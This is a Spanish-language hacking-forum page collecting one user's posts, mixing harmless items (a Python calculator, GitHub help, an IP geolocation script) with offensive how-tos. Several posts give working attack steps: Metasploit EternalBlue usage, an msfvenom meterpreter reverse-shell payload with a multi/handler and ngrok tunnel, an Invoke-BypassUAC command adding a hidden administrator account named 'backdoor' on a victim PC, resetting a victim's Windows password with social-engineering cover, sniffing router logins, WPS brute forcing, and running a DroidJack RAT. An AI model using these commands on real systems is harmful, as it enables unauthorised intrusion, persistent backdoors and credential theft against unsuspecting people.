Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - DtxdF

#1281
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Lo mas fácil que se me ocurre es crear una carpeta vacía y subirla usando la función de arrastrar a través de la web.

Hola, pero lo hago y no me funciona, sera por que la versión de mi navegador es obsoleta: Uso windows xp y me imagino que ese es el problema pero si tu me puedes confirmar que puedes subir archivos con carpetas arrastrándolos te lo agradecería.

- DtxdF
#1282
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Hola, Eh investigado un poco de la vulnerabilidad que dices y eh obtenido un resultado, lastimosamente no te puedo confirmar si funciona por que actualmente no puedo usar mi SO linux en mi pc, pero por suerte la fuente es confiable: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

- DtxdF
#1283
Hola!

Hola, Necesito crear una carpeta en mi repositorio de Github a través de la web pero no consigo la opción, ni tampoco consigo un tutorial o algo por el estilo.

Espero sus repuestas

- DtxdF
#1284
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

- Si tu sabes que existe una vulnerabilidad en el servicio SMB(445) entonces abrirás el msfconsole y ejecutas lo siguiente: use exploit/windows/smb/ms17_010_eternalblue, con este comando en metasploit usaras un modulo que explotara la vulnerabilidad de microsoft denominada eternalblue - Esta vulnerabilidad permite enviar paquetes maliciosos que son entendidos por este servicio, así ejecutando ccodigo remotamente.

- Es cuestión de saber el significado, Te daré unos ejemplo basicos pero importantes de como usar msfconsole (metasploit framework - console):

* - use <modulo a usar>
* - show <modulo/s a mostrar>
* - info - una vez seleccionado un modulo podras ver la informacion de ese modulo
* - show options - cuando selecciones un modulo podras ver las variables para establecer
* - set <variable> - aqui podras establecer un valor de una variable

# Espero te sirva


Hola, compañero.

Ante todo, gracias por responder.

Te pongo un ejemplo: nmap me dice lo siguiente (víctima Linux-based):

Código: text
445/tcp open  netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)


¿Cómo deduzco a partir de aquí que he de usar el exploit "exploit/windows/smb/ms17_010_eternalblue" , como tú dices, y no otro? :'(

De hecho, si una vez abro msfconsole, hago "search samba", me salen todos estos exploits.
Código: text

Matching Modules
================

   Name                                            Disclosure Date  Rank       Description
   ----                                            ---------------  ----       -----------
   auxiliary/admin/smb/samba_symlink_traversal                      normal     Samba Symlink Directory Traversal
   auxiliary/dos/samba/lsa_addprivs_heap                            normal     Samba lsa_io_privilege_set Heap Overflow
   auxiliary/dos/samba/lsa_transnames_heap                          normal     Samba lsa_io_trans_names Heap Overflow
   auxiliary/dos/samba/read_nttrans_ea_list                         normal     Samba read_nttrans_ea_list Integer Overflow
   auxiliary/scanner/rsync/modules_list                             normal     List Rsync Modules
   auxiliary/scanner/smb/smb_uninit_cred                            normal     Samba _netr_ServerPasswordSet Uninitialized Credential State
   exploit/freebsd/samba/trans2open                2003-04-07       great      Samba trans2open Overflow (*BSD x86)
   exploit/linux/samba/chain_reply                 2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)
   exploit/linux/samba/is_known_pipename           2017-03-24       excellent  Samba is_known_pipename() Arbitrary Module Load
   exploit/linux/samba/lsa_transnames_heap         2007-05-14       good       Samba lsa_io_trans_names Heap Overflow
   exploit/linux/samba/setinfopolicy_heap          2012-04-10       normal     Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   exploit/linux/samba/trans2open                  2003-04-07       great      Samba trans2open Overflow (Linux x86)
   exploit/multi/samba/nttrans                     2003-04-07       average    Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   exploit/multi/samba/usermap_script              2007-05-14       excellent  Samba "username map script" Command Execution
   exploit/osx/samba/lsa_transnames_heap           2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/osx/samba/trans2open                    2003-04-07       great      Samba trans2open Overflow (Mac OS X PPC)
   exploit/solaris/samba/lsa_transnames_heap       2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/solaris/samba/trans2open                2003-04-07       great      Samba trans2open Overflow (Solaris SPARC)
   exploit/unix/misc/distcc_exec                   2002-02-01       excellent  DistCC Daemon Command Execution
   exploit/unix/webapp/citrix_access_gateway_exec  2010-12-21       excellent  Citrix Access Gateway Command Execution
   exploit/windows/fileformat/ms14_060_sandworm    2014-10-14       excellent  MS14-060 Microsoft Windows OLE Package Manager Code Execution
   exploit/windows/http/sambar6_search_results     2003-06-21       normal     Sambar 6 Search Results Buffer Overflow
   exploit/windows/license/calicclnt_getconfig     2005-03-02       average    Computer Associates License Client GETCONFIG Overflow
   exploit/windows/smb/group_policy_startup        2015-01-26       manual     Group Policy Script Execution From Shared Resource
   post/linux/gather/enum_configs                                   normal     Linux Gather Configurations


Y me quedo igual, porque no sé cuál usar....¿cómo lo sabes tú?

Gracias por la ayuda!



1) - Como lo se?, por que me gusta mucho investigar acerca de esto busca en google (o el buscador que estés usando), 'noticias de seguridad informatica', te recomiendo que veas canales de youtube de personas que le guste enseñar cosas de este tema

2) - Como se que exploit usar?, Por que como yo ya he investigado y hay tutoriales de como explotar la vulnerabilidad, ya se que eh hacer

3) - Aveces, hay momentos en los que la web no te ayuda, a lo que me refiero tu mismo debes descubrir como usar una cosa, no que vas a presionar teclas o dar click ya que puede ser dañino porque si uno no sabe que es no sabe lo que pasara (Ejemplo: Si tu no sabes que hace el archivo que te envio tu amigo, no lo ejecutes ya que uno no sabe si al ejecutarlo se te mete una puerta trasera o algo por el estilo)

4) - Si el escaneo de nmap te dijo que el SO era windows y te dijo que el puerto abierto era el 445 puedes explotar esta vulnerabilidad.

5) - Si el escaneo de nmap te dijo que era otro SO y otro puerto abierto o otra información, usa tu buscador como ayuda

Recomendaciones: Ten creatividad al buscar dependiendo del ataque, si no tienes una idea o no se te viene nada a la cabeza, tranquilo guarda la calma, investiga hasta que el ataque sea como hablar, escribir comer, cosas fáciles

Nota: El exploit eternalblue metasploit no lo tiene por defecto tienes que actualizarlo o buscar el eternalblue de elevenpaths, para actualizar metasploit usa el comando msfupdate
#1285
Python / Re:Creación de una Calculadora
Julio 07, 2018, 03:46:32 PM
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Hola!

Hola amigo, Te cree un script de python (para sumar, restar, multiplicar y dividir por medio de consola, espero te guste)

Código: python
# -*- coding: utf-8 -*-

# de el modulo time quiero que importe sleep para hacer una pause en un periodo de tiempo determinado

from time import sleep

# Created by: DtxdF
# Hola: z0mb1es
# Script: calc.py
# Crearemos una clase llamada operadora para definir los valores y la operacion
# Si necesitas colocar

class operadora:

def __init__(self, num1, num2):

self.num1 = int(num1)
self.num2 = int(num2)

def suma(self):

return self.num1+self.num2

def resta(self):

return self.num1-self.num2

def division(self):

return self.num1/self.num2

def multiplicacion(self):

return self.num1*self.num2


# Aqui solo coloco las variables para el menu de ayuda a mostrar

help_main = {"1":"Suma","2":"Resta","3":"Division","4":"multiplicacion"}

print "\n"

print "Calculadora:"
print "Creado por DtxdF para ayudar a: z0mb1es ..."
print "Hola: https://underc0de.org\n"

for a,b in help_main.items():

print "[%s] \t-\t [%s]" % (a,b)

print "\nUso: Use la variable seguido de los valores, Ejemplo: suma 45 45\n"

while True:

try:

debug = raw_input(">>>")

if not debug:
continue

if debug.split()[0].lower() == 'suma':

numero1 = int(debug.split()[1])
numero2 = int(debug.split()[2])

print "Resultado: %s" % str(operadora(numero1,numero2).suma())

elif debug.split()[0].lower() == 'resta':

numero1 = int(debug.split()[1])
numero2 = int(debug.split()[2])

print "Resultado: %s" % str(operadora(numero1,numero2).resta())

elif debug.split()[0].lower() == 'division':

numero1 = int(debug.split()[1])
numero2 = int(debug.split()[2])

print "Resultado: %s" % str(operadora(numero1,numero2).division())

elif debug.split()[0].lower() == 'multiplicacion':

numero1 = int(debug.split()[1])
numero2 = int(debug.split()[2])

print "Resultado: %s" % str(operadora(numero1,numero2).multiplicacion())

else:

print "No se a encontrado el operador"

except KeyboardInterrupt:

print "CTRL-C, Saliendo ..."
sleep(3.5)
quit()

except ValueError:

print "El valor tiene que ser numerico"

except IndexError:

print "Hace falta un valor en alguna variable"

except EOFError:

print "Tecla invalida"

except Exception as a:

print("Error: "+str(a))


El uso es facil:

* - suma numero1 numero2
* - resta numero1 numero2
* - division numero1 numero2
* - multiplicacion numero1 numero2

# A penas leí este post cree una mini-calculadora para que te ayude en la programacion

# Espero te sirva

# Lo subi a github por si quieres descargarlo o ver mas herramientas: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

- DtxdF
#1286
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

CitarLa combinatoria es brutal. Y aquí es donde viene mi duda. Hay alguna manera de saber qué exploits/payloads pueden dar resultado o cuáles van a ser inútiles?

No tengo manera ni criterio de cuál probar. Y hacerlo uno a uno por si suena la flauta no lo veo. Tiene que haber algo que lo identifique.

Hola, Para saber que modulo de metasploit usar debes saber que vulnerabilidad o función tiene si explotas esa vulnerabilidad de ese servicio, por ejemplo:

- Si tu sabes que existe una vulnerabilidad en el servicio SMB(445) entonces abrirás el msfconsole y ejecutas lo siguiente: use exploit/windows/smb/ms17_010_eternalblue, con este comando en metasploit usaras un modulo que explotara la vulnerabilidad de microsoft denominada eternalblue - Esta vulnerabilidad permite enviar paquetes maliciosos que son entendidos por este servicio, así ejecutando ccodigo remotamente.

- Es cuestión de saber el significado, Te daré unos ejemplo basicos pero importantes de como usar msfconsole (metasploit framework - console):

* - use <modulo a usar>
* - show <modulo/s a mostrar>
* - info - una vez seleccionado un modulo podras ver la informacion de ese modulo
* - show options - cuando selecciones un modulo podras ver las variables para establecer
* - set <variable> - aqui podras establecer un valor de una variable

# Espero te sirva

- DtxdF

Nota: No son todos los comandos, puedes buscar un tutorial, libro, etc ...
#1287
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Me tira el siguiente error, ayudame!  :(:

Exception in thread "main" java.lang.UnsupportedClassVersionError: com/zero1/SandroRatClient/DroidJack : Unsupported major.minor version 51.0
        at java.lang.ClassLoader.defineClass1(Native Method)
        at java.lang.ClassLoader.defineClassCond(Unknown Source)
        at java.lang.ClassLoader.defineClass(Unknown Source)
        at java.security.SecureClassLoader.defineClass(Unknown Source)
        at java.net.URLClassLoader.defineClass(Unknown Source)
        at java.net.URLClassLoader.access$000(Unknown Source)
        at java.net.URLClassLoader$1.run(Unknown Source)
        at java.security.AccessController.doPrivileged(Native Method)
        at java.net.URLClassLoader.findClass(Unknown Source)
        at java.lang.ClassLoader.loadClass(Unknown Source)
        at sun.misc.Launcher$AppClassLoader.loadClass(Unknown Source)
        at java.lang.ClassLoader.loadClass(Unknown Source)
Could not find the main class: com.zero1.SandroRatClient.DroidJack. Program will exit.
#1288
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Una pregunta, es una vulnerabilidad?, o mejor dicho como se hace manualmente?, se ve interesante ...

Eh notado que el rat 888 también usa esta opción que cambia la extensión de un archivo pero sigue siendo ejecutable, a lo que me refiero no es el tipo cambio de extensión de => payload.exe a => payload.jpg.exe, visualmente se ve asi => payload.jpg pero seguirá siendo ejecutable

Espero tu respuesta
#1289
Este post no solo me costo publicarlo debido a la dificultad de mi internet, si no tambien programando y subiendolo a github (por que es primera vez que subo un proyecto a github, espero les guste)

Esto lo hago con la finalidad de enseñarles que tan facil es geolocalizar una dirección IP, a traves de la consola.

Eh diseñado un script en python llamado: 'BreadBad' que se encarga de geolocalizar una dirección IP o un dominio.

Instalacion y Uso:

1) - Nos vamos a mi repositorio de github donde se encuentra BreadBad: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta



2) - Clonamos o descargarmos el repositorio:



3) - Extraemos, Abrimos nuestra consola y ejecutamos No tienes permitido ver enlaces. Registrate o Entra a tu cuenta



Nota: lo sobraye asi porque cada vez que ejecutamos BreadBad nos mostrara informacion de nuestra direccion ip (En este caso era la informacion de mi ip y no quiero que se muestre)



4) - Una vez ya hecho los pasos anteriores usamos el siguiente comando para ver la información de una ip en especifico: ipadress No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Nota: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta se puede cambiar por una direccion ip que queramos localizar, y No tienes permitido ver enlaces. Registrate o Entra a tu cuenta es un dominio existente



# Una vez ya definida el dominio/IP podremos ejecutar los comandos que nos aparece en el menu de ayuda al inicio de la ejecucion como por ejemplo: Country (Que nos muestra el pais de origen de esa direccion ip), City (La ciudad de origen de la direccion ip), y asi sucesivamente para ver la informacion en especifico.

# Espero les halla gustado ...

- DtxdF
#1290
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Bueno, te soy sincero no se si existe una APP en android o un programa o script para windows o linux para ver los pines del router, pero la manera en que yo veo el pin wps de un router es a través de la pagina del router, por ejemplo: Un router Belkin tendra esta direccion ip: 192.168.2.1 (Es un ejemplo puede tener otra), ingresas en tu navegador No tienes permitido ver enlaces. Registrate o Entra a tu cuenta, ingresas la contraseña (Claro si tiene contraseña) y hay tienes que buscar:  Inalámbrico > Acceso Protegido Wi-Fi(WPS), aqui te dira toda la informacion del sistema wps.

Extra: Si lo que deseas, ya sea horita o en el futuro puedes usar wpspin en android para hacer fuerza bruta a el wps de un router o puedes usar kali linux o otra distribucion de seguridad informatica para hacer esto mismo.

Espero te halla ayudado.

- DtxdF
#1291
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

CitarWow muchas gracias no habia visto tu respuesta y pregunte nuevamente . ahora mismo investigo.. gracias!!!

De nada  ;)

Te recomiendo que veas datagramas de conexiones tcp's, y de metasploit (Si deseas claro).

- DtxdF
#1292
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Te recomiendo que investigues de ngrok, Es una herramienta de tunelizacion, Que crea un servidor perteneciente a este mismo hacia una conexión a tu localhost, Podiendo así visualizar una conexión no muy rápida fuera de la red lan.

Investiga: En youtube o Google (O tu buscador), hay muchisima informacion sobre esta incrible herramienta.

Cuando lo entiendas ejecuta el siguiente comando para asi hacer un tunnel a un puerto tcp:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip publica (no la local)> LPORT=<puerto a usar> -f exe -o <nombre del payload>
msfconsole:

- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost <tu ip>
- set lport <tu puerto>
- exploit -j

abre una consola nueva: ngrok tcp <puerto>

te cambiara la vista de la consola y te dira que url debes utilizar para lograr una conexion.

Te cambia la ip?, si haces ping <url que te da ngrok>, te muestra la ip de ese servidor y no la tuya.

Espero te sirva

- DtxdF
#1293
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

CitarLo probe en mi PC personal con un usuario administrador y se me ha creado perfectamente el usuario pero este sigue como cuenta "Estandar" no en "Administradores" donde debería estar. Será porque en el comando para crear el usuario dice "administrators" en lugar de Administradores? (que es como se muestra el nombre del grupo al verificar por net localgroup). En primer lugar pensaría que no pero bueno, quiza ustedes sepan aclarar esta duda o bien decirme en que estoy errando.

No es un error, por si acaso se piensa, Yo use el ejemplo que me da el mismo Invoke-BypassUAC, El comando correto seria: net localgroup Administradores <usuario> /add

Administrators: Es por si acaso el windows esta en ingles (English)

CitarSobre el segundo método de ntpassword, no creo que funcione ya que al estar cifrado el disco con Bitlocker ToGo, al reiniciar la pc e iniciar desde CD/DVD/USB el mismo para acceder pide la Key, de lo contrario, no se puede acceder a ningún archivo.

Eh investigado y no encuentro información en concreto de si se puede quitar la password de windows (Con ntpassword) con los datos cifrados, pero te recomiendo que te lo descargues igualmente y lo grabes de verdad es muy bueno, yo lo tengo y lo eh probado, como ya lo eh mencionado. ntpassword utiliza un metodo que es resetear (o creo que sobreescribe el archivo SAM de windows => %systemroot%\system32\config), El archivo sam de windows almacena las contraseñas de los usuarios de windows.

Si ese archivo esta cifrado significa que windows puede tener un fallo ya que no podrá leer las contraseñas al iniciar sesión, pero te recomiendo que aun lo sigas intentando.

CitarEn fin, creo que tendré que rendirme, porque tampoco no hay nadie "fisico" que ponga un password en el PC como para implantar algún Keylogger, lo hace la gente de sistemas mediante remoto y en contadas (muy) ocasiones que no quede otra que ejecutar como administrador algo.

No te rindas hermano, uno no sabe si de repente el motodo que te digo funciona (Por x motivo, ya sea porque sea tu dia de suerte), Aveces veo softwares que tienen funciones que yo digo: "Como hacen eso es super espectacular", investigo e investigo y tarde o temprano lo consigo.

- Sigue intentando, y no te rindas tan facil

Nota: ntpassword no se inicia desde windows si no desde el menú de booteo, El archivo SAM no se puede leer desde windows pero si desde otro sistema operativo, como lo es linux (ntpassword esta escrito en linux)

Espero te halla ayudado

- DtxdF
#1294
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Como respondió @No tienes permitido ver enlaces. Registrate o Entra a tu cuenta si se puede buscar vulnerabilidades con solo ver el código del login del router o una pagina del router, pero si te das de cuenta arriba al lado izquierdo de la url (En chrome) esta el protocolo si usa http (Inseguro) puedes usar un sniffer, y robar las credenciales de inicio de sesión.

OJO: El protocolo http lo usan la mayoria de routers, no estoy diciendo que todos usaran http en vez de https.

Sniffers recomendados: Uno hecho por ti o: Ettercap, wireshark, y muchos mas que son buenos para estos ataques
#1295
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

CitarYa instale Parrot, como XP, Windows Server 2003, Ubuntu, Arch y todas funcionan bien. Tambien probe que sea probelma de la tarjeta de red (una TP-LINK) pero aunque la desconectaba tampoco funcionaba, fue lo primero que pense cuando vi el error de Windows 7.

Despues de tratar de solucionarlo buscando en internet o probando cosas yo mismo, recien ahi vine a publicar para ver si alguien me daba una mano porque no se como arreglarlo jaja.

Una ultima recomendación coloca en google (o un buscar cualquiera) el código del error o desde la web oficial de microsoft, por lo menos una persona en el mundo tuvo el mismo problema que tu ...

Espero se te solucione ...
#1296
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

CitarSiempre es bueno aclarar que la herramienta se hizo con el fin de solucionar o facilitar una tarea (en fin a lo que el programa cumplirá como función) ya que si la persona lo compra corre bajo su riesgo el uso que le dé a dicha aplicación...por lo que tú no te haces responsable por el mal uso que le dé al programa (fuera de su finalidad a tal) y/o la pérdida de datos.

En criollo:

Si programa es para pintar caricaturas (ej.) Y el usuario final la compra....si él lo usa para distribuir malware no es tu responsabilidad ya que ese programa no fue hecho con tal fin

Gracias por responder ya me quedo claro, puedo dormir tranquilo xD ... (Ya enserio, gracias fueron de gran ayuda)
#1297
2 MÉTODOS - Que yo eh usado:

1er Método: Descargar Invoke-BypassUAC => No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Sacas el powershell de la maquina victima en caso de que lo tenga y debe tener instalado win7,8,10 (creo que acepta mas este script pero no lo eh probado en otros como winVISTA), y ejecutas: Import-Module .\Invoke-BypassUAC.ps1; Invoke-BypassUAC -Command 'net user backdoor "Password123" /add && net localgroup administrators backdoor /add"' -Verbose

# Se creara un usuario llamado backdoor con la contraseña Password123 con privilegios de administrador
# Desventajas de este método: Necesitas powershell, no puedes usarlo en winXP o anteriores (lo se porque yo tengo winXP sin embargo lo eh probado en win7,win8,win10), y no estoy seguro de que se pueda ejecutar ejemplo: en el usuario Invitado o un usuario sin privilegios.

2do Método: Descargar ntpassword (Pagina oficial) => No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Lo descargas lo grabas en un cd/dvd (Te recomiendo que uses Alcohol 120%, ese fue el que yo use para grabar ntpassword), reinicias el pc-Victima, insertas el cd/dvd, seleccionas el menu de booteo, selecciones el nombre o id del cd/dvd y luego comenzara a iniciarse el software.

NOTA: Solo te digo como descargarlo y algo de como grabarlo, te recomiendo que busques en youtube porque hay muchos videos acerca de ntpassword

# Desventajas de este metodo: necesitas ntpassword, necesitas tiempo no solo descargando e grabandolo, tambien en el ataque ya que necesitas hacer muchas cosas para iniciarlo.

Recomendaciones: No ultilizes mimikatz, ya que si no tienes privilegios de administrador ya sea que sea usuario invitado o un usuario que no tenga privilegios no podras dumpear las contraseñas, si usas el segundo metodo usa la ingenieria social: di que vas reiniciar la pc por que se quedo colgada tendras un periodo de 30 seg. para hacer el ataque, eso es en caso de que te esten vigilando.

# Espero te halla servido  ;)
#1298
Eh diseñado un script en python que utiliza una api para hacer una petición a su base de datos para tener información de un numero telefónico en especifico, si te interesa como instalarlo y usarlo puedes verlo desde el mismo underc0de: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Edito:

Ahora que lo leo suena como si estuviera haciendo publicidad, pero el script tiene la funcionalidad de buscar la localización en algunos telefonos
#1299
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Hermano!, te diré por mi experiencia por que yo eh instalado tanto como kali como win(xp,vista,7,10), pero te aconsejo que busques mas informacion ya que es bueno tener mucha informacion antes de hacer un objectivo que nos propongamos (En tu caso es resolver ese problema).

Cuando la pantalla azul de la muerte (Blue Screen, Pantalla Azul, etc) aparece es porque esta fallando un controlador, driver, etc como te lo indica en la imagen, puede ser que tu computador le haga falta una especificación o hay una especificación de tu pc que esta chocando con la instalación de los SO, te digo esto porque cuando yo instale kali linux en mi pc (actual que es de madera prácticamente por lo vieja que es), me dio el mismo error, posteriormente lo instale en una pc que contenía windows 10, la formatee y instale kali y todo bien, investigue y era que no tenia una buena tarjeta grafica, y solo tenia 1gb de ram.

Te recomiendo que revises si le falta un requerimiento, instalalo fuera de VM (me refiero desde el booteo), instala Parrot security OS si no lo has hecho este pide menos requerimientos y puede correr con una computadora vieja.

Espero que te sirva.
#1300
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Gracias por responder, Ya eh leido acerca de licencias y todo lo relacionado, Díganme si me equivoco pero ademas de los term. y condiciones de la licencia por ejemplo la licencia GPL: Que permite USO, MODIFICACIÓN, COMERCIALIZACIÓN, pero lo obliga a que si se distribuyera tiene que usar la misma licencia, ademas de eso yo puedo colocar un ejemplo unos terminos y condiciones que impliquen que el creador del software no se hace responsable por un acto delictivo y/o si se usa para perjudicar o dañar una persona o dispositivo, me equivoco? o voy bien?.

# Aunque este tema de las licencias no sea muy divertido que digamos, es muy importante